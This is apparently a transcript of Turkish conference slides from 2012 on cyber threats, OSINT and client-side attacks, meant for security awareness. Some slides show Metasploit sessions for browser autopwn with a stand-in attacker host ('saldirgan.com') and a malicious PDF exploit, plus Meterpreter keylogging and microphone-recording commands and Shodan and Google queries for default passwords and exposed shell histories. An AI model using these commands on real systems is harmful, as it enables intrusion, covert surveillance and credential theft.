Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü...
Transcript of Yeni Dünya Düzeninde Siber Saldırılar - CEHTurkiye · 2012-04-18 · Hacking Kültürü...
Yeni Dünya Düzeninde Siber Saldırılar ve
Güncel Siber Tehditler
Ozan UÇAR
Boğaziçi Compec, EXIT 2012 İstanbul
Konuşmacı Hakkında
• Bilgi Güvenliği Uzmanı ve Eğitmen
– Bilgi Güvenliği AKADEMİSİ (www.bga.com.tr)
• Penetration Tester
• Blog Yazarı
– www.cehturkiye.com
– blog.bga.com.tr
• İletişim
– Skype: ozan.ucar
– Eposta: [email protected]
www.bga.com.tr 2
Genel Konu Başlıkları
• Yeni Dünya Düzeninde Siber Güvenliğin Rolü
• Siber Tehditler
• Siber İstihbarat Toplama Yöntemleri
• İstemci Tabanlı Saldırı Türleri
• Başarılı Bir Saldırı Sonrası Olası Tehditler
• Casus Yazılım Tehlikeleri
• Kablosuz Ağlara Yönelik Saldırılar
www.bga.com.tr 3
Bilgilendirme
• Bu sunumdaki tüm ekran görüntüleri internet üzerindeki açık kaynaklardan elde edilmiştir.
www.bga.com.tr 4
Hacking Kültürü Hakkında
Bilgisayar yer altı dünyası bir aynalı salondur. Gerçekler bükülür, doğrular küçülür.
www.bga.com.tr 5
Genel Terim ve Kavramlar
Siber savaş(cyber warfare), siber tehditler, siber suç(cyber crime), cyber espionage, cyber intelligence, siber sabotaj(cyber sabotage), siber terörizm (Cyberterrorism), siber casusluk (Cyber spying), siber silah (cyber o weapon), sızma testleri (penetration test), siber güvenlik yarışmaları(CTF -Capture The Flag)
Yeni Dünya Düzeninde Siber Güvenlik
Firmalara Etkileri
• Sanayi casusluğu
• Prestij kaybı
• Maddi kayıplar
• İnternek kaynaklarını servis dışı bırakma (DDOS)
• Sahte belge
RSA
RSA Detay
15 Yaşında, Gerçek Bir Tehdit…
ISP’nin DDoS’a Cevabı
Botnet Satın Alma
Siber Şantaj
SONY
Açık Kaynak İstihbarat Toplama Yöntemleri
• OSINT, Internet kaynakları kullanarak hedef sistem/kişiler hakkında bilgi toplama ve bu bilgileri hedef sistem/kişi hakkında değer ifadece edecek formata dönüştürme.
• Temelde iki bölümden oluşur:
– Görünen açık kaynaklardan bilgi toplama
– Genele açık olmayan forumlar/IRC odaları kullanarak bilgi toplama
Bilgi Toplama
• Hackerların sistemlere saldırmadan önce internet üzerinden nasıl bilgi edindikleri, bu bilgilerin nerelerde kullanıldığının anlaşılması.
• Sistemli çalışan bir hacker herşeyden önce istihbarat toplama işlemi/keşif)yapar.
Bilgi Toplama Yöntemleri
• Amaç hedef sistem hakkında olabildiğince çok bilgi toplamaktır.
• Bilgi toplama;
– Hedef sistemle doğrudan iletişime geçerek
– Hedef sistemden bağımsız olmak üzere iki türdür.
• Bilgi toplama yöntemleri
– Pasif bilgi toplama
– Aktif bilgi toplama
Arama Motorlarından Bilgi Toplama
• Arama motoru != Google
• Google haricinde özellştirilmiş arama motorları da vardır
• ShodanHQ – Pentesterlar için
• Pipl.com kişiler hakkında toplu bilgi edinme amaçlı
Pipl.com Aracılığı ile Şahıs Arama
• Pipl.com kiş arama için en ideal sonuçları bulan bir arama motorudur
Shodan
• Değişik bir arama motoru:Shodanhq.com
• Tamamen güvenlik testleri yapanlara yönelik geliştirilmiş bir sistem mantığıyla çalışır – Internete açık sistemlerde default bırakılmış
parolaları bulma
• SHODAN, filtreler kullanarak çeşitli bilgisayar tabanlı sistemleri (desktop, switch, router, servers vb.) bulmayı sağlayan bir arama motorudur
Shodan Örnek
“default password”
net:1.1.1.1/24
“cisco-ios” “last-modified” country:TR
Google Aracılığıyla Bilgi Toplama
• Google üzerinden “gelişmiş” arama yapmak için çeşitli teknikler bulunmaktadır.
• Bu tekniklere GoogleHacking adı verilir. – Bu teknikler çeşitli özel kelimelerden oluşur ve genelde akılda
kalmaz
• Efektif arama yapabilmek için bu kelimeleri ezberlemek yerine – Bu özel kelimeleri barındıran çeşitli programlar kullanılabilir
• Bu programlardan en kullanışlı olanı GoolagScanner’dir. • Alternatif olarak Google Hacking terimini bize kazandıran
GHD(google hacking database) kullanılabilir
Google Arama İpuçları
• Site:www.google.com – Sadece google.com için arama yapar
• Allintitle:Security admin – Title’inda security ve admin geçenleri arar
• İnurl:test deneme – url’de test geri kalan kısımlarda deneme içeren
sonuçlar
• Allinurl:google test – Url de google ve test içeren sonuçlar
Google Hacking Database (GHDB)
http://www.exploit-db.com/google-dorks/
Google’dan Hesap Bilgileri
Örnek:.bash_history
http://www.southerndivasecrets.com/.bash_history Uygulama
Türkiye’den Örnekler
Siber Savaşın Devletlere Etkileri
• Ülkeleri sarsan siber savaşlar
• Çağın en tehlikeli siber silahları: Stuxnet, Duqu
• Ddos saldırıları
• Hactivist aktiviter
• Veri sızdırma girişimleri
• Ajan yazılımlar
• ….
LULZSEC
• Ekip kimlerden oluşuyor ?
• Operasyonları ticari mi politik mi ?
• Özgürlük savaşçıları mı ?
• Ellerinde, kimlere ait ne kadar
veri var ?
http://twitter.com/#!/LulzSec
ANONYMOUS
STUXNET & DUQU
BTK Veritabanı Sızdırıldı
Siber Suçlardan İlk İstifa
Türkiye’nin Kimlik Haritası..
Son Kullanıcıya Yönelik Saldırılar
• Kişisel veriler
• Banka bilgileri
• Eposta hesapları
• MSN/Skype yazışmaları
• Gizli webcam görüntüleri
• Ortam dinleme
• Facebook, Twitter hesapları
• ….
www.bga.com.tr 40
1.200.000 Kişinin Hassas Bilgileri Internet’te
İstemci Tabanlı Saldırı Türleri
• Browser (İnternet Tarayıcılar)
• Eposta Yazılımları
• PDF Okuyucular
• Office Yazılımları
• XSS Saldırıları
• Java Uygulamaları
• Media Player
• Casus Yazılımlar
• Sosyal Mühendislik www.bga.com.tr 42
Saldırı Sonrası Olası Tehditler
• Keylogger Kurulumu
– Klavye girişlerinin dinlenmesi
• Webcam Casusu
– Gizli video kaydı, fotoğraf çekimi
• Ortam Dinleme
– Ses kaydı
• Veri Sızdırma
– Kayıtlı parolalar, önemli ofis dosyaları vb.
• Bilgisayarı Köleleştirme
– Botnet ordusuna katılma, DDOS saldırılarında bulunma
www.bga.com.tr 43
İstemci Bilgisayarlar Nasıl Korunuyor ?
• Antivirüs Yazılımları
– Antivirus motorları
– İmza tabanlı & Sezgisel
– Bypass teknikleri
• Kişisel Firewall Yazılımları
– Atlatma senaryoları ...
• Bilinç
– Farkındalık ve eğitimin
www.bga.com.tr 44
Tanınmaz Meterpreter Ajanı
www.bga.com.tr 45
Meterpreter | Keylogger
www.bga.com.tr 47
Keylogger olarak kullanımı;
> keyscan_start
> keyscan_dump
Hedefin ekran görüntüsünü ele geçirme
> screeshot
Meterpreter | Webcam Casusu
www.bga.com.tr 48
Webcam görüntüsünü ele geçirmek
Webcam canlı video görüntüsünü almak
Meterpreter | Ortam Dinleme
www.bga.com.tr 49
Kurban sistemde bir mikrofon varsa, ortam dinlemesi yapılabilir.
// 25. sn boyunca dinleme yap ve kaydet.
record_mic -d 25
[*] Starting...
[*] Stopped
Audio saved to: /opt/metasploit3/msf3/nFqYscte.wav
Ajan Marmara (Sanal Klavye Ajanı)
www.bga.com.tr 50
Web İnjection
www.bga.com.tr 51
Video
Browser Tabanlı Açıklıklar
• Bir browser exploiti, kötü amaçlı geliştirilmiş zararlı kod parçasıdır.
• Kullanıcının bilgisi olmadan, bilgisayarına zararlı yazılım bulaştırmak veya izinsiz/yetkisiz değişikliklerde bulunmak için kullanılır.
• Zararlı kod; HTML, Image, Java, Javascript, ActiveX veya başka bir web teknolojisi olabilir.
• Zayıflıklar, browser teknolojisinden veya eklentilerinden kaynaklanabilir.
www.bga.com.tr 52
Browser Tabanlı Açıklıklar | Uygulama
• Browser Autopwn ile otomotik browser exploit msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST saldirgan.com
LHOST => 85.95.238.172
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set URIPATH /giris
URIPATH => /giris
msf auxiliary(browser_autopwn) > exploit
[*] --- Done, found 23 exploit modules
[*] Using URL: http://0.0.0.0:80/giris
[*] Local IP: http://saldirgan.com :80/giris
www.bga.com.tr 53
PDF Okuyucular| Uygulama
PDF formatının popüler olması ile birlikte, PDF okuyucuların açıklıklarları etkili bir hacking malzemesi haline gelmiştir.
• Adobe Reader msf > use exploit/windows/fileformat/adobe_geticon
msf exploit(adobe_geticon) > set FILENAME belge.pdf
FILENAME => belge.pdf
msf exploit(adobe_geticon) > exploit
[*] Creating 'belge.pdf' file...
[+] belge.pdf stored at /var/www/belge.pdf
www.bga.com.tr 54
Sosyal Mühendislik Saldırıları
Teknik sorunlar teknik yollarla çözülür, insan tabanlı sorunlar insanla çözülür …
• Oltalama saldırıları
– facebook.com > facabook.com
• Bir web sitesinin bire bir benzerini (clone) oluşturmak
• Java Uygulamaları
• Sahte Kablosuz Ağlar
www.bga.com.tr 55
En Zayıf Halka: İnsan
www.bga.com.tr 56
SM | Oltalama Saldırıları
www.bga.com.tr 57
1
3 2
Sahte Eposta Gönderme
www.bga.com.tr 58
Sahte Eposta Gönderme
www.bga.com.tr 59
SM | Web Clone & Java Applet
Social-Engineer Toolkit
www.bga.com.tr 60
Java uygulaması olarak casus yazılım bulaştırma
Sahte Kablosuz Erişim Noktaları
• Yalnızca amacı kötü olduğu için “sahte” olarak isimlendirilir, gerçeğinden ayırt edilemez
• Kablosuz ağ istemcileri, saldırgan tarafından yayın yapan kablosuz ağa dahil oldukdan sonra, tüm internet trafiği kaydedilir.
• DNS önbelleğini zehirleyerek sahte erişim sayfaları ile kimlik avı yapabilir.
www.bga.com.tr 61
Sahte Kablosuz Erişim Noktaları
www.bga.com.tr 62
Saldırı yapılan sistemden ekran görüntüsü
Sahte Kablosuz Erişim Noktaları
www.bga.com.tr 63
İnternete ilk girildiği anda, sahte bir güncelleme mesajı ile casus yazılım kurban bilgisayara yüklenir.
Teşekkürler